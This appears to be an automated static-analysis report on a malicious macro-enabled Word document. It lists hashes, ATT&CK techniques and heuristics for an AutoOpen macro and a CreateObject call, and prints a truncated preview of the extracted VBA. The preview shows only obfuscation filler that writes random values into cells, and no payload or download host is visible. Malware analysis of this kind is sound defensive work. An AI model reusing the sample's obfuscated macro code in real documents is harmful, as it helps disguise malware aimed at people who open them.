Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6110e52ac2001ac3…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 51.5 KB
Created: 2021-05-20 14:39:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2021-05-26
MD5: 84b210184734e8763a7935f3c9538725
SHA-1: 9a2af1bcccad2df74a74da1df20564239df3d644
SHA-256: 6110e52ac2001ac309e378ed399ccada4135464bc17268bfb022d7aac224d9c2
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA project with an AutoOpen macro. The macro uses CreateObject to execute arbitrary code, a common technique for downloading and running further malicious payloads. Together, the AutoOpen macro and the CreateObject call strongly suggest malicious intent, most likely initial execution of a second-stage payload.

Heuristics (5)

  • VBA project inside OOXML (severity: medium; 3 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • CreateObject call (severity: high) [OLE_VBA_CREATEOBJ]
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs, each found in document text (OOXML body / shared strings). All thirteen are the standard XML namespace identifiers that every Word OOXML document declares, not network indicators:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 60307 bytes
SHA-256: c9d71c25b2e6dbff70d291af8eb2182b2c44d07c51baaf6919407553b8807db4
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function ORzj(RMFUxz As Object)
RMFUxz.Application.Cells(659, 7) = "97"
RMFUxz.Application.Cells(437, 26) = "yUf"
RMFUxz.Application.Cells(583, 7) = "20"
RMFUxz.Application.Cells(369, 7) = "815"
RMFUxz.Application.Cells(286, 11) = "krhKEScul"
RMFUxz.Application.Cells(614, 6) = "bjqPkp"
RMFUxz.Application.Cells(649, 24) = "997"
RMFUxz.Application.Cells(883, 6) = "JTCoqqbz"
RMFUxz.Application.Cells(700, 17) = "200"
RMFUxz.Application.Cells(912, 14) = "614"
RMFUxz.Application.Cells(495, 5) = "nwbgF"
RMFUxz.Application.Cells(770, 21) = "rTpOx"
RMFUxz.Application.Cells(163, 17) = "AqE"
RMFUxz.Application.Cells(326, 23) = "98"
RMFUxz.Application.Cells(519, 16) = "WwUAbRI"
RMFUxz.Application.Cells(281, 6) = "423"
RMFUxz.Application.Cells(389, 10) = "peEVXZbg"
RMFUxz.Application.Cells(570, 15) = "125"
RMFUxz.Application.Cells(391, 18) = "zVdDO"
RMFUxz.Application.Cells(729, 18) = "435"
RMFUxz.Application.Cells(843, 20) = "94"
RMFUxz.Application.Cells(748, 26) = "43"
RMFUxz.Application.Cells(502, 16) = "828"
RMFUxz.Application.Cells(184, 24) = "LFfoP"
RMFUxz.Application.Cells(247, 13) = "856"
RMFUxz.Application.Cells(282, 5) = "99"
RMFUxz.Application.Cells(489, 17) = "TAdoCJ"
RMFUxz.Application.Cells(885, 26) = "IJfrr"
RMFUxz.Application.Cells(168, 1) = "aegEKBj"
RMFUxz.Application.Cells(354, 9) = "638"
RMFUxz.Application.Cells(878, 20) = "Rbrw"
RMFUxz.Application.Cells(936, 17) = "ESsGVb"
RMFUxz.Application.Cells(113, 1) = "eCrSOHgmm"
RMFUxz.Application.Cells(719, 25) = "501"
RMFUxz.Application.Cells(911, 18) = "326"
RMFUxz.Application.Cells(593, 12) = "nxKYG"
RMFUxz.Application.Cells(206, 25) = "100"
RMFUxz.Application.Cells(805, 15) = "ldKaCn"
RMFUxz.Application.Cells(253, 6) = "644"
RMFUxz.Application.Cells(516, 10) = "pdLzWCp"
RMFUxz.Application.Cells(599, 21) = "424"
RMFUxz.Application.Cells(695, 21) = "365"
RMFUxz.Application.Cells(278, 7) = "101"
RMFUxz.Application.Cells(178, 13) = "ehUrczL"
RMFUxz.Application.Cells(759, 8) = "804"
RMFUxz.Application.Cells(557, 7) = "966"
RMFUxz.Application.Cells(383, 18) = "218"
RMFUxz.Application.Cells(895, 2) = "jNYUkvGQ"
RMFUxz.Application.Cells(284, 17) = "tap"
RMFUxz.Application.Cells(212, 2) = "bqNASOWSA"
RMFUxz.Application.Cells(528, 8) = "421"
RMFUxz.Application.Cells(131, 1) = "8"
RMFUxz.Application.Cells(337, 13) = "ijlv"
RMFUxz.Application.Cells(445, 11) = "ZLoudHq"
RMFUxz.Application.Cells(986, 20) = "lGBfZfjNg"
RMFUxz.Application.Cells(606, 13) = "363"
RMFUxz.Application.Cells(491, 19) = "wNVRf"
RMFUxz.Application.Cells(387, 22) = "558"
RMFUxz.Application.Cells(617, 25) = "306"
RMFUxz.Application.Cells(258, 22) = "102"
RMFUxz.Application.Cells(674, 13) = "Ozh"
RMFUxz.Application.Cells(986, 8) = "689"
RMFUxz.Application.Cells(388, 1) = "815"
RMFUxz.Application.Cells(327, 14) = "384"
RMFUxz.Application.Cells(611, 24) = "619"
RMFUxz.Application.Cells(579, 9) = "ZOVED"
RMFUxz.Application.Cells(148, 12) = "dQMwsa"
RMFUxz.Application.Cells(828, 11) = "apC"
RMFUxz.Application.Cells(424, 7) = "367"
RMFUxz.Application.Cells(985, 2) = "zcTvre"
RMFUxz.Application.Cells(734, 2) = "702"
RMFUxz.Application.Cells(646, 15) = "OogMKNB"
RMFUxz.Application.Cells(696, 11) = "SGGIA"
RMFUxz.Application.Cells(405, 8) = "fWeL"
RMFUxz.Application.Cells(619, 1) = "bIWUxqmz"
RMFUxz.Application.Cells(752, 9) = "eYHF"
RMFUxz.Application.Cells(710, 20) = "cvLhcAia"
RMFUxz.Application.Cells(675, 24) = "XIOydzVl"
RMFUxz.Application.Cells(352, 12) = "dVTxeItI"
RMFUxz.Application.Cells(847, 11) = "103"
RMFUxz.Application.Cells(160, 18) = "sknkv"
RMFUxz.Application.Cells(454, 25) = "fGmuYdQi"
RMFUxz.Application.Cells(590, 26) = "245"
RMFUxz.Application.Cells(507, 21) = "tTzh"
RMFUxz.Applicatio
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 91136 bytes
SHA-256: efdc21c9cc61540b39cb3dec2fa5de5a58e450966339deed5f649c48dc6f2f4e